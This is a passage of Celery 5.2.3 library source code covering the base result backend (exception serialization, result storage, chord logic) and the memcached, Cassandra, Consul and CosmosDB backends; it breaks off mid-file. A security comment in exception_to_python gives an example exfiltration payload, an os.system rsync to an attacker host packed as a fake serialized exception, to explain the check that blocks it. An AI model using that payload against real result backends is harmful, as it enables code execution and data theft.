exc exception_info = ExceptionInfo((type_, exc, tb)) self.mark_as_failure(task_id, exc, exception_info.traceback) return exception_info finally: while tb is not None: try: tb.tb_frame.clear() tb.tb_frame.f_locals except RuntimeError: # Ignore the exception raised if the frame is still executing. pass tb = tb.tb_next del tb def prepare_exception(self, exc, serializer=None): """Prepare exception for serialization.""" serializer = self.serializer if serializer is None else serializer if serializer in EXCEPTION_ABLE_CODECS: return get_pickleable_exception(exc) exctype = type(exc) return {'exc_type': getattr(exctype, '__qualname__', exctype.__name__), 'exc_message': ensure_serializable(exc.args, self.encode), 'exc_module': exctype.__module__} def exception_to_python(self, exc): """Convert serialized exception to Python exception.""" if not exc: return None elif isinstance(exc, BaseException): if self.serializer in EXCEPTION_ABLE_CODECS: exc = get_pickled_exception(exc) return exc elif not isinstance(exc, dict): try: exc = dict(exc) except TypeError as e: raise TypeError(f"If the stored exception isn't an " f"instance of " f"BaseException, it must be a dictionary.\n" f"Instead got: {exc}") from e exc_module = exc.get('exc_module') try: exc_type = exc['exc_type'] except KeyError as e: raise ValueError("Exception information must include" "the exception type") from e if exc_module is None: cls = create_exception_cls( exc_type, __name__) else: try: # Load module and find exception class in that cls = sys.modules[exc_module] # The type can contain qualified name with parent classes for name in exc_type.split('.'): cls = getattr(cls, name) except (KeyError, AttributeError): cls = create_exception_cls(exc_type, celery.exceptions.__name__) exc_msg = exc.get('exc_message', '') # If the recreated exception type isn't indeed an exception, # this is a security issue. Without the condition below, an attacker # could exploit a stored command vulnerability to execute arbitrary # python code such as: # os.system("rsync /data attacker@192.168.56.100:~/data") # The attacker sets the task's result to a failure in the result # backend with the os as the module, the system function as the # exception type and the payload # rsync /data attacker@192.168.56.100:~/data # as the exception arguments like so: # { # "exc_module": "os", # "exc_type": "system", # "exc_message": "rsync /data attacker@192.168.56.100:~/data" # } if not isinstance(cls, type) or not issubclass(cls, BaseException): fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}' raise SecurityError( f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}") # XXX: Without verifying `cls` is actually an exception class, # an attacker could execute arbitrary python code. # cls could be anything, even eval(). try: if isinstance(exc_msg, (tuple, list)): exc = cls(*exc_msg) else: exc = cls(exc_msg) except Exception as err: # noqa exc = Exception(f'{cls}({exc_msg})') return exc def prepare_value(self, result): """Prepare value for storage.""" if self.serializer != 'pickle' and isinstance(result, ResultBase): return result.as_tuple() return result def encode(self, data): _, _, payload = self._encode(data) return payload def _encode(self, data): return dumps(data, serializer=self.serializer) def meta_from_decoded(self, meta): if meta['status'] in self.EXCEPTION_STATES: meta['result'] = self.exception_to_python(meta['result']) return meta def decode_result(self, payload): return self.meta_from_decoded(self.decode(payload)) def decode(self, payload): if payload is None: return payload payload = payload or str(payload) return loads(payload, content_type=self.content_type, content_encoding=self.content_encoding, accept=self.accept) def prepare_expires(self, value, type=None): if value is None: value = self.app.conf.result_expires if isinstance(value, timedelta): value = value.total_seconds() if value is not None and type: return type(value) return value def prepare_persistent(self, enabled=None): if enabled is not None: return enabled persistent = self.app.conf.result_persistent return self.persistent if persistent is None else persistent def encode_result(self, result, state): if state in self.EXCEPTION_STATES and isinstance(result, Exception): return self.prepare_exception(result) return self.prepare_value(result) def is_cached(self, task_id): return task_id in self._cache def _get_result_meta(self, result, state, traceback, request, format_date=True, encode=False): if state in self.READY_STATES: date_done = datetime.utcnow() if format_date: date_done = date_done.isoformat() else: date_done = None meta = { 'status': state, 'result': result, 'traceback': traceback, 'children': self.current_task_children(request), 'date_done': date_done, } if request and getattr(request, 'group', None): meta['group_id'] = request.group if request and getattr(request, 'parent_id', None): meta['parent_id'] = request.parent_id if self.app.conf.find_value_for_key('extended', 'result'): if request: request_meta = { 'name': getattr(request, 'task', None), 'args': getattr(request, 'args', None), 'kwargs': getattr(request, 'kwargs', None), 'worker': getattr(request, 'hostname', None), 'retries': getattr(request, 'retries', None), 'queue': request.delivery_info.get('routing_key') if hasattr(request, 'delivery_info') and request.delivery_info else None } if encode: # args and kwargs need to be encoded properly before saving encode_needed_fields = {"args", "kwargs"} for field in encode_needed_fields: value = request_meta[field] encoded_value = self.encode(value) request_meta[field] = ensure_bytes(encoded_value) meta.update(request_meta) return meta def _sleep(self, amount): time.sleep(amount) def store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Update task state and result. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. """ result = self.encode_result(result, state) retries = 0 while True: try: self._store_result(task_id, result, state, traceback, request=request, **kwargs) return result except Exception as exc: if self.always_retry and self.exception_safe_to_retry(exc): if retries < self.max_retries: retries += 1 # get_exponential_backoff_interval computes integers # and time.sleep accept floats for sub second sleep sleep_amount = get_exponential_backoff_interval( self.base_sleep_between_retries_ms, retries, self.max_sleep_between_retries_ms, True) / 1000 self._sleep(sleep_amount) else: raise_with_context( BackendStoreError("failed to store result on the backend", task_id=task_id, state=state), ) else: raise def forget(self, task_id): self._cache.pop(task_id, None) self._forget(task_id) def _forget(self, task_id): raise NotImplementedError('backend does not implement forget.') def get_state(self, task_id): """Get the state of a task.""" return self.get_task_meta(task_id)['status'] get_status = get_state # XXX compat def get_traceback(self, task_id): """Get the traceback for a failed task.""" return self.get_task_meta(task_id).get('traceback') def get_result(self, task_id): """Get the result of a task.""" return self.get_task_meta(task_id).get('result') def get_children(self, task_id): """Get the list of subtasks sent by a task.""" try: return self.get_task_meta(task_id)['children'] except KeyError: pass def _ensure_not_eager(self): if self.app.conf.task_always_eager: warnings.warn( "Shouldn't retrieve result with task_always_eager enabled.", RuntimeWarning ) def exception_safe_to_retry(self, exc): """Check if an exception is safe to retry. Backends have to overload this method with correct predicates dealing with their exceptions. By default no exception is safe to retry, it's up to backend implementation to define which exceptions are safe. """ return False def get_task_meta(self, task_id, cache=True): """Get task meta from backend. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. """ self._ensure_not_eager() if cache: try: return self._cache[task_id] except KeyError: pass retries = 0 while True: try: meta = self._get_task_meta_for(task_id) break except Exception as exc: if self.always_retry and self.exception_safe_to_retry(exc): if retries < self.max_retries: retries += 1 # get_exponential_backoff_interval computes integers # and time.sleep accept floats for sub second sleep sleep_amount = get_exponential_backoff_interval( self.base_sleep_between_retries_ms, retries, self.max_sleep_between_retries_ms, True) / 1000 self._sleep(sleep_amount) else: raise_with_context( BackendGetMetaError("failed to get meta", task_id=task_id), ) else: raise if cache and meta.get('status') == states.SUCCESS: self._cache[task_id] = meta return meta def reload_task_result(self, task_id): """Reload task result, even if it has been previously fetched.""" self._cache[task_id] = self.get_task_meta(task_id, cache=False) def reload_group_result(self, group_id): """Reload group result, even if it has been previously fetched.""" self._cache[group_id] = self.get_group_meta(group_id, cache=False) def get_group_meta(self, group_id, cache=True): self._ensure_not_eager() if cache: try: return self._cache[group_id] except KeyError: pass meta = self._restore_group(group_id) if cache and meta is not None: self._cache[group_id] = meta return meta def restore_group(self, group_id, cache=True): """Get the result for a group.""" meta = self.get_group_meta(group_id, cache=cache) if meta: return meta['result'] def save_group(self, group_id, result): """Store the result of an executed group.""" return self._save_group(group_id, result) def delete_group(self, group_id): self._cache.pop(group_id, None) return self._delete_group(group_id) def cleanup(self): """Backend cleanup.""" def process_cleanup(self): """Cleanup actions to do at the end of a task worker process.""" def on_task_call(self, producer, task_id): return {} def add_to_chord(self, chord_id, result): raise NotImplementedError('Backend does not support add_to_chord') def on_chord_part_return(self, request, state, result, **kwargs): pass def set_chord_size(self, group_id, chord_size): pass def fallback_chord_unlock(self, header_result, body, countdown=1, **kwargs): kwargs['result'] = [r.as_tuple() for r in header_result] try: body_type = getattr(body, 'type', None) except NotRegistered: body_type = None queue = body.options.get('queue', getattr(body_type, 'queue', None)) if queue is None: # fallback to default routing if queue name was not # explicitly passed to body callback queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name priority = body.options.get('priority', getattr(body_type, 'priority', 0)) self.app.tasks['celery.chord_unlock'].apply_async( (header_result.id, body,), kwargs, countdown=countdown, queue=queue, priority=priority, ) def ensure_chords_allowed(self): pass def apply_chord(self, header_result_args, body, **kwargs): self.ensure_chords_allowed() header_result = self.app.GroupResult(*header_result_args) self.fallback_chord_unlock(header_result, body, **kwargs) def current_task_children(self, request=None): request = request or getattr(get_current_task(), 'request', None) if request: return [r.as_tuple() for r in getattr(request, 'children', [])] def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return (unpickle_backend, (self.__class__, args, kwargs)) class SyncBackendMixin: def iter_native(self, result, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None): self._ensure_not_eager() results = result.results if not results: return task_ids = set() for result in results: if isinstance(result, ResultSet): yield result.id, result.results else: task_ids.add(result.id) yield from self.get_many( task_ids, timeout=timeout, interval=interval, no_ack=no_ack, on_message=on_message, on_interval=on_interval, ) def wait_for_pending(self, result, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None, callback=None, propagate=True): self._ensure_not_eager() if on_message is not None: raise ImproperlyConfigured( 'Backend does not support on_message callback') meta = self.wait_for( result.id, timeout=timeout, interval=interval, on_interval=on_interval, no_ack=no_ack, ) if meta: result._maybe_set_cache(meta) return result.maybe_throw(propagate=propagate, callback=callback) def wait_for(self, task_id, timeout=None, interval=0.5, no_ack=True, on_interval=None): """Wait for task and return its result. If the task raises an exception, this exception will be re-raised by :func:`wait_for`. Raises: celery.exceptions.TimeoutError: If `timeout` is not :const:`None`, and the operation takes longer than `timeout` seconds. """ self._ensure_not_eager() time_elapsed = 0.0 while 1: meta = self.get_task_meta(task_id) if meta['status'] in states.READY_STATES: return meta if on_interval: on_interval() # avoid hammering the CPU checking status. time.sleep(interval) time_elapsed += interval if timeout and time_elapsed >= timeout: raise TimeoutError('The operation timed out.') def add_pending_result(self, result, weak=False): return result def remove_pending_result(self, result): return result @property def is_async(self): return False class BaseBackend(Backend, SyncBackendMixin): """Base (synchronous) result backend.""" BaseDictBackend = BaseBackend # XXX compat class BaseKeyValueStoreBackend(Backend): key_t = ensure_bytes task_keyprefix = 'celery-task-meta-' group_keyprefix = 'celery-taskset-meta-' chord_keyprefix = 'chord-unlock-' implements_incr = False def __init__(self, *args, **kwargs): if hasattr(self.key_t, '__func__'): # pragma: no cover self.key_t = self.key_t.__func__ # remove binding self._encode_prefixes() super().__init__(*args, **kwargs) if self.implements_incr: self.apply_chord = self._apply_chord_incr def _encode_prefixes(self): self.task_keyprefix = self.key_t(self.task_keyprefix) self.group_keyprefix = self.key_t(self.group_keyprefix) self.chord_keyprefix = self.key_t(self.chord_keyprefix) def get(self, key): raise NotImplementedError('Must implement the get method.') def mget(self, keys): raise NotImplementedError('Does not support get_many') def _set_with_state(self, key, value, state): return self.set(key, value) def set(self, key, value): raise NotImplementedError('Must implement the set method.') def delete(self, key): raise NotImplementedError('Must implement the delete method') def incr(self, key): raise NotImplementedError('Does not implement incr') def expire(self, key, value): pass def get_key_for_task(self, task_id, key=''): """Get the cache key for a task by id.""" key_t = self.key_t return key_t('').join([ self.task_keyprefix, key_t(task_id), key_t(key), ]) def get_key_for_group(self, group_id, key=''): """Get the cache key for a group by id.""" key_t = self.key_t return key_t('').join([ self.group_keyprefix, key_t(group_id), key_t(key), ]) def get_key_for_chord(self, group_id, key=''): """Get the cache key for the chord waiting on group with given id.""" key_t = self.key_t return key_t('').join([ self.chord_keyprefix, key_t(group_id), key_t(key), ]) def _strip_prefix(self, key): """Take bytes: emit string.""" key = self.key_t(key) for prefix in self.task_keyprefix, self.group_keyprefix: if key.startswith(prefix): return bytes_to_str(key[len(prefix):]) return bytes_to_str(key) def _filter_ready(self, values, READY_STATES=states.READY_STATES): for k, value in values: if value is not None: value = self.decode_result(value) if value['status'] in READY_STATES: yield k, value def _mget_to_results(self, values, keys, READY_STATES=states.READY_STATES): if hasattr(values, 'items'): # client returns dict so mapping preserved. return { self._strip_prefix(k): v for k, v in self._filter_ready(values.items(), READY_STATES) } else: # client returns list so need to recreate mapping. return { bytes_to_str(keys[i]): v for i, v in self._filter_ready(enumerate(values), READY_STATES) } def get_many(self, task_ids, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None, max_iterations=None, READY_STATES=states.READY_STATES): interval = 0.5 if interval is None else interval ids = task_ids if isinstance(task_ids, set) else set(task_ids) cached_ids = set() cache = self._cache for task_id in ids: try: cached = cache[task_id] except KeyError: pass else: if cached['status'] in READY_STATES: yield bytes_to_str(task_id), cached cached_ids.add(task_id) ids.difference_update(cached_ids) iterations = 0 while ids: keys = list(ids) r = self._mget_to_results(self.mget([self.get_key_for_task(k) for k in keys]), keys, READY_STATES) cache.update(r) ids.difference_update({bytes_to_str(v) for v in r}) for key, value in r.items(): if on_message is not None: on_message(value) yield bytes_to_str(key), value if timeout and iterations * interval >= timeout: raise TimeoutError(f'Operation timed out ({timeout})') if on_interval: on_interval() time.sleep(interval) # don't busy loop. iterations += 1 if max_iterations and iterations >= max_iterations: break def _forget(self, task_id): self.delete(self.get_key_for_task(task_id)) def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): meta = self._get_result_meta(result=result, state=state, traceback=traceback, request=request) meta['task_id'] = bytes_to_str(task_id) # Retrieve metadata from the backend, if the status # is a success then we ignore any following update to the state. # This solves a task deduplication issue because of network # partitioning or lost workers. This issue involved a race condition # making a lost task overwrite the last successful result in the # result backend. current_meta = self._get_task_meta_for(task_id) if current_meta['status'] == states.SUCCESS: return result try: self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state) except BackendStoreError as ex: raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex return result def _save_group(self, group_id, result): self._set_with_state(self.get_key_for_group(group_id), self.encode({'result': result.as_tuple()}), states.SUCCESS) return result def _delete_group(self, group_id): self.delete(self.get_key_for_group(group_id)) def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" meta = self.get(self.get_key_for_task(task_id)) if not meta: return {'status': states.PENDING, 'result': None} return self.decode_result(meta) def _restore_group(self, group_id): """Get task meta-data for a task by id.""" meta = self.get(self.get_key_for_group(group_id)) # previously this was always pickled, but later this # was extended to support other serializers, so the # structure is kind of weird. if meta: meta = self.decode(meta) result = meta['result'] meta['result'] = result_from_tuple(result, self.app) return meta def _apply_chord_incr(self, header_result_args, body, **kwargs): self.ensure_chords_allowed() header_result = self.app.GroupResult(*header_result_args) header_result.save(backend=self) def on_chord_part_return(self, request, state, result, **kwargs): if not self.implements_incr: return app = self.app gid = request.group if not gid: return key = self.get_key_for_chord(gid) try: deps = GroupResult.restore(gid, backend=self) except Exception as exc: # pylint: disable=broad-except callback = maybe_signature(request.chord, app=app) logger.exception('Chord %r raised: %r', gid, exc) return self.chord_error_from_stack( callback, ChordError(f'Cannot restore group: {exc!r}'), ) if deps is None: try: raise ValueError(gid) except ValueError as exc: callback = maybe_signature(request.chord, app=app) logger.exception('Chord callback %r raised: %r', gid, exc) return self.chord_error_from_stack( callback, ChordError(f'GroupResult {gid} no longer exists'), ) val = self.incr(key) # Set the chord size to the value defined in the request, or fall back # to the number of dependencies we can see from the restored result size = request.chord.get("chord_size") if size is None: size = len(deps) if val > size: # pragma: no cover logger.warning('Chord counter incremented too many times for %r', gid) elif val == size: callback = maybe_signature(request.chord, app=app) j = deps.join_native if deps.supports_native_join else deps.join try: with allow_join_result(): ret = j( timeout=app.conf.result_chord_join_timeout, propagate=True) except Exception as exc: # pylint: disable=broad-except try: culprit = next(deps._failed_join_report()) reason = 'Dependency {0.id} raised {1!r}'.format( culprit, exc, ) except StopIteration: reason = repr(exc) logger.exception('Chord %r raised: %r', gid, reason) self.chord_error_from_stack(callback, ChordError(reason)) else: try: callback.delay(ret) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', gid, exc) self.chord_error_from_stack( callback, ChordError(f'Callback error: {exc!r}'), ) finally: deps.delete() self.client.delete(key) else: self.expire(key, self.expires) class KeyValueStoreBackend(BaseKeyValueStoreBackend, SyncBackendMixin): """Result backend base class for key/value stores.""" class DisabledBackend(BaseBackend): """Dummy result backend.""" _cache = {} # need this attribute to reset cache in tests. def store_result(self, *args, **kwargs): pass def ensure_chords_allowed(self): raise NotImplementedError(E_CHORD_NO_BACKEND.strip()) def _is_disabled(self, *args, **kwargs): raise NotImplementedError(E_NO_BACKEND.strip()) def as_uri(self, *args, **kwargs): return 'disabled://' get_state = get_status = get_result = get_traceback = _is_disabled get_task_meta_for = wait_for = get_many = _is_disabled ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cache.py0000664000175000017500000001132100000000000017345 0ustar00asifasif00000000000000"""Memcached and in-memory cache result backend.""" from kombu.utils.encoding import bytes_to_str, ensure_bytes from kombu.utils.objects import cached_property from celery.exceptions import ImproperlyConfigured from celery.utils.functional import LRUCache from .base import KeyValueStoreBackend __all__ = ('CacheBackend',) _imp = [None] REQUIRES_BACKEND = """\ The Memcached backend requires either pylibmc or python-memcached.\ """ UNKNOWN_BACKEND = """\ The cache backend {0!r} is unknown, Please use one of the following backends instead: {1}\ """ # Global shared in-memory cache for in-memory cache client # This is to share cache between threads _DUMMY_CLIENT_CACHE = LRUCache(limit=5000) def import_best_memcache(): if _imp[0] is None: is_pylibmc, memcache_key_t = False, bytes_to_str try: import pylibmc as memcache is_pylibmc = True except ImportError: try: import memcache except ImportError: raise ImproperlyConfigured(REQUIRES_BACKEND) _imp[0] = (is_pylibmc, memcache, memcache_key_t) return _imp[0] def get_best_memcache(*args, **kwargs): # pylint: disable=unpacking-non-sequence # This is most definitely a sequence, but pylint thinks it's not. is_pylibmc, memcache, key_t = import_best_memcache() Client = _Client = memcache.Client if not is_pylibmc: def Client(*args, **kwargs): kwargs.pop('behaviors', None) return _Client(*args, **kwargs) return Client, key_t class DummyClient: def __init__(self, *args, **kwargs): self.cache = _DUMMY_CLIENT_CACHE def get(self, key, *args, **kwargs): return self.cache.get(key) def get_multi(self, keys): cache = self.cache return {k: cache[k] for k in keys if k in cache} def set(self, key, value, *args, **kwargs): self.cache[key] = value def delete(self, key, *args, **kwargs): self.cache.pop(key, None) def incr(self, key, delta=1): return self.cache.incr(key, delta) def touch(self, key, expire): pass backends = { 'memcache': get_best_memcache, 'memcached': get_best_memcache, 'pylibmc': get_best_memcache, 'memory': lambda: (DummyClient, ensure_bytes), } class CacheBackend(KeyValueStoreBackend): """Cache result backend.""" servers = None supports_autoexpire = True supports_native_join = True implements_incr = True def __init__(self, app, expires=None, backend=None, options=None, url=None, **kwargs): options = {} if not options else options super().__init__(app, **kwargs) self.url = url self.options = dict(self.app.conf.cache_backend_options, **options) self.backend = url or backend or self.app.conf.cache_backend if self.backend: self.backend, _, servers = self.backend.partition('://') self.servers = servers.rstrip('/').split(';') self.expires = self.prepare_expires(expires, type=int) try: self.Client, self.key_t = backends[self.backend]() except KeyError: raise ImproperlyConfigured(UNKNOWN_BACKEND.format( self.backend, ', '.join(backends))) self._encode_prefixes() # rencode the keyprefixes def get(self, key): return self.client.get(key) def mget(self, keys): return self.client.get_multi(keys) def set(self, key, value): return self.client.set(key, value, self.expires) def delete(self, key): return self.client.delete(key) def _apply_chord_incr(self, header_result_args, body, **kwargs): chord_key = self.get_key_for_chord(header_result_args[0]) self.client.set(chord_key, 0, time=self.expires) return super()._apply_chord_incr( header_result_args, body, **kwargs) def incr(self, key): return self.client.incr(key) def expire(self, key, value): return self.client.touch(key, value) @cached_property def client(self): return self.Client(self.servers, **self.options) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs servers = ';'.join(self.servers) backend = f'{self.backend}://{servers}/' kwargs.update( {'backend': backend, 'expires': self.expires, 'options': self.options}) return super().__reduce__(args, kwargs) def as_uri(self, *args, **kwargs): """Return the backend as an URI. This properly handles the case of multiple servers. """ servers = ';'.join(self.servers) return f'{self.backend}://{servers}/' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cassandra.py0000664000175000017500000001732200000000000020250 0ustar00asifasif00000000000000"""Apache Cassandra result store backend using the DataStax driver.""" import threading from celery import states from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import BaseBackend try: # pragma: no cover import cassandra import cassandra.auth import cassandra.cluster import cassandra.query except ImportError: # pragma: no cover cassandra = None __all__ = ('CassandraBackend',) logger = get_logger(__name__) E_NO_CASSANDRA = """ You need to install the cassandra-driver library to use the Cassandra backend. See https://github.com/datastax/python-driver """ E_NO_SUCH_CASSANDRA_AUTH_PROVIDER = """ CASSANDRA_AUTH_PROVIDER you provided is not a valid auth_provider class. See https://datastax.github.io/python-driver/api/cassandra/auth.html. """ Q_INSERT_RESULT = """ INSERT INTO {table} ( task_id, status, result, date_done, traceback, children) VALUES ( %s, %s, %s, %s, %s, %s) {expires}; """ Q_SELECT_RESULT = """ SELECT status, result, date_done, traceback, children FROM {table} WHERE task_id=%s LIMIT 1 """ Q_CREATE_RESULT_TABLE = """ CREATE TABLE {table} ( task_id text, status text, result blob, date_done timestamp, traceback blob, children blob, PRIMARY KEY ((task_id), date_done) ) WITH CLUSTERING ORDER BY (date_done DESC); """ Q_EXPIRES = """ USING TTL {0} """ def buf_t(x): return bytes(x, 'utf8') class CassandraBackend(BaseBackend): """Cassandra backend utilizing DataStax driver. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`cassandra-driver` is not available, or if the :setting:`cassandra_servers` setting is not set. """ #: List of Cassandra servers with format: ``hostname``. servers = None supports_autoexpire = True # autoexpire supported via entry_ttl def __init__(self, servers=None, keyspace=None, table=None, entry_ttl=None, port=9042, **kwargs): super().__init__(**kwargs) if not cassandra: raise ImproperlyConfigured(E_NO_CASSANDRA) conf = self.app.conf self.servers = servers or conf.get('cassandra_servers', None) self.port = port or conf.get('cassandra_port', None) self.keyspace = keyspace or conf.get('cassandra_keyspace', None) self.table = table or conf.get('cassandra_table', None) self.cassandra_options = conf.get('cassandra_options', {}) if not self.servers or not self.keyspace or not self.table: raise ImproperlyConfigured('Cassandra backend not configured.') expires = entry_ttl or conf.get('cassandra_entry_ttl', None) self.cqlexpires = ( Q_EXPIRES.format(expires) if expires is not None else '') read_cons = conf.get('cassandra_read_consistency') or 'LOCAL_QUORUM' write_cons = conf.get('cassandra_write_consistency') or 'LOCAL_QUORUM' self.read_consistency = getattr( cassandra.ConsistencyLevel, read_cons, cassandra.ConsistencyLevel.LOCAL_QUORUM) self.write_consistency = getattr( cassandra.ConsistencyLevel, write_cons, cassandra.ConsistencyLevel.LOCAL_QUORUM) self.auth_provider = None auth_provider = conf.get('cassandra_auth_provider', None) auth_kwargs = conf.get('cassandra_auth_kwargs', None) if auth_provider and auth_kwargs: auth_provider_class = getattr(cassandra.auth, auth_provider, None) if not auth_provider_class: raise ImproperlyConfigured(E_NO_SUCH_CASSANDRA_AUTH_PROVIDER) self.auth_provider = auth_provider_class(**auth_kwargs) self._cluster = None self._session = None self._write_stmt = None self._read_stmt = None self._lock = threading.RLock() def _get_connection(self, write=False): """Prepare the connection for action. Arguments: write (bool): are we a writer? """ if self._session is not None: return self._lock.acquire() try: if self._session is not None: return self._cluster = cassandra.cluster.Cluster( self.servers, port=self.port, auth_provider=self.auth_provider, **self.cassandra_options) self._session = self._cluster.connect(self.keyspace) # We're forced to do concatenation below, as formatting would # blow up on superficial %s that'll be processed by Cassandra self._write_stmt = cassandra.query.SimpleStatement( Q_INSERT_RESULT.format( table=self.table, expires=self.cqlexpires), ) self._write_stmt.consistency_level = self.write_consistency self._read_stmt = cassandra.query.SimpleStatement( Q_SELECT_RESULT.format(table=self.table), ) self._read_stmt.consistency_level = self.read_consistency if write: # Only possible writers "workers" are allowed to issue # CREATE TABLE. This is to prevent conflicting situations # where both task-creator and task-executor would issue it # at the same time. # Anyway; if you're doing anything critical, you should # have created this table in advance, in which case # this query will be a no-op (AlreadyExists) make_stmt = cassandra.query.SimpleStatement( Q_CREATE_RESULT_TABLE.format(table=self.table), ) make_stmt.consistency_level = self.write_consistency try: self._session.execute(make_stmt) except cassandra.AlreadyExists: pass except cassandra.OperationTimedOut: # a heavily loaded or gone Cassandra cluster failed to respond. # leave this class in a consistent state if self._cluster is not None: self._cluster.shutdown() # also shuts down _session self._cluster = None self._session = None raise # we did fail after all - reraise finally: self._lock.release() def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" self._get_connection(write=True) self._session.execute(self._write_stmt, ( task_id, state, buf_t(self.encode(result)), self.app.now(), buf_t(self.encode(traceback)), buf_t(self.encode(self.current_task_children(request))) )) def as_uri(self, include_password=True): return 'cassandra://' def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" self._get_connection() res = self._session.execute(self._read_stmt, (task_id, )).one() if not res: return {'status': states.PENDING, 'result': None} status, result, date_done, traceback, children = res return self.meta_from_decoded({ 'task_id': task_id, 'status': status, 'result': self.decode(result), 'date_done': date_done, 'traceback': self.decode(traceback), 'children': self.decode(children), }) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs kwargs.update( {'servers': self.servers, 'keyspace': self.keyspace, 'table': self.table}) return super().__reduce__(args, kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/consul.py0000664000175000017500000000735000000000000017614 0ustar00asifasif00000000000000"""Consul result store backend. - :class:`ConsulBackend` implements KeyValueStoreBackend to store results in the key-value store of Consul. """ from kombu.utils.encoding import bytes_to_str from kombu.utils.url import parse_url from celery.backends.base import KeyValueStoreBackend from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger try: import consul except ImportError: consul = None logger = get_logger(__name__) __all__ = ('ConsulBackend',) CONSUL_MISSING = """\ You need to install the python-consul library in order to use \ the Consul result store backend.""" class ConsulBackend(KeyValueStoreBackend): """Consul.io K/V store backend for Celery.""" consul = consul supports_autoexpire = True consistency = 'consistent' path = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.consul is None: raise ImproperlyConfigured(CONSUL_MISSING) # # By default, for correctness, we use a client connection per # operation. If set, self.one_client will be used for all operations. # This provides for the original behaviour to be selected, and is # also convenient for mocking in the unit tests. # self.one_client = None self._init_from_params(**parse_url(self.url)) def _init_from_params(self, hostname, port, virtual_host, **params): logger.debug('Setting on Consul client to connect to %s:%d', hostname, port) self.path = virtual_host self.hostname = hostname self.port = port # # Optionally, allow a single client connection to be used to reduce # the connection load on Consul by adding a "one_client=1" parameter # to the URL. # if params.get('one_client', None): self.one_client = self.client() def client(self): return self.one_client or consul.Consul(host=self.hostname, port=self.port, consistency=self.consistency) def _key_to_consul_key(self, key): key = bytes_to_str(key) return key if self.path is None else f'{self.path}/{key}' def get(self, key): key = self._key_to_consul_key(key) logger.debug('Trying to fetch key %s from Consul', key) try: _, data = self.client().kv.get(key) return data['Value'] except TypeError: pass def mget(self, keys): for key in keys: yield self.get(key) def set(self, key, value): """Set a key in Consul. Before creating the key it will create a session inside Consul where it creates a session with a TTL The key created afterwards will reference to the session's ID. If the session expires it will remove the key so that results can auto expire from the K/V store """ session_name = bytes_to_str(key) key = self._key_to_consul_key(key) logger.debug('Trying to create Consul session %s with TTL %d', session_name, self.expires) client = self.client() session_id = client.session.create(name=session_name, behavior='delete', ttl=self.expires) logger.debug('Created Consul session %s', session_id) logger.debug('Writing key %s to Consul', key) return client.kv.put(key=key, value=value, acquire=session_id) def delete(self, key): key = self._key_to_consul_key(key) logger.debug('Removing key %s from Consul', key) return self.client().kv.delete(key) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cosmosdbsql.py0000664000175000017500000001526700000000000020650 0ustar00asifasif00000000000000"""The CosmosDB/SQL backend for Celery (experimental).""" from kombu.utils import cached_property from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import pydocumentdb from pydocumentdb.document_client import DocumentClient from pydocumentdb.documents import (ConnectionPolicy, ConsistencyLevel, PartitionKind) from pydocumentdb.errors import HTTPFailure from pydocumentdb.retry_options import RetryOptions except ImportError: # pragma: no cover pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \ HTTPFailure = ConnectionPolicy = RetryOptions = None __all__ = ("CosmosDBSQLBackend",) ERROR_NOT_FOUND = 404 ERROR_EXISTS = 409 LOGGER = get_logger(__name__) class CosmosDBSQLBackend(KeyValueStoreBackend): """CosmosDB/SQL backend for Celery.""" def __init__(self, url=None, database_name=None, collection_name=None, consistency_level=None, max_retry_attempts=None, max_retry_wait_time=None, *args, **kwargs): super().__init__(*args, **kwargs) if pydocumentdb is None: raise ImproperlyConfigured( "You need to install the pydocumentdb library to use the " "CosmosDB backend.") conf = self.app.conf self._endpoint, self._key = self._parse_url(url) self._database_name = ( database_name or conf["cosmosdbsql_database_name"]) self._collection_name = ( collection_name or conf["cosmosdbsql_collection_name"]) try: self._consistency_level = getattr( ConsistencyLevel, consistency_level or conf["cosmosdbsql_consistency_level"]) except AttributeError: raise ImproperlyConfigured("Unknown CosmosDB consistency level") self._max_retry_attempts = ( max_retry_attempts or conf["cosmosdbsql_max_retry_attempts"]) self._max_retry_wait_time = ( max_retry_wait_time or conf["cosmosdbsql_max_retry_wait_time"]) @classmethod def _parse_url(cls, url): _, host, port, _, password, _, _ = _parse_url(url) if not host or not password: raise ImproperlyConfigured("Invalid URL") if not port: port = 443 scheme = "https" if port == 443 else "http" endpoint = f"{scheme}://{host}:{port}" return endpoint, password @cached_property def _client(self): """Return the CosmosDB/SQL client. 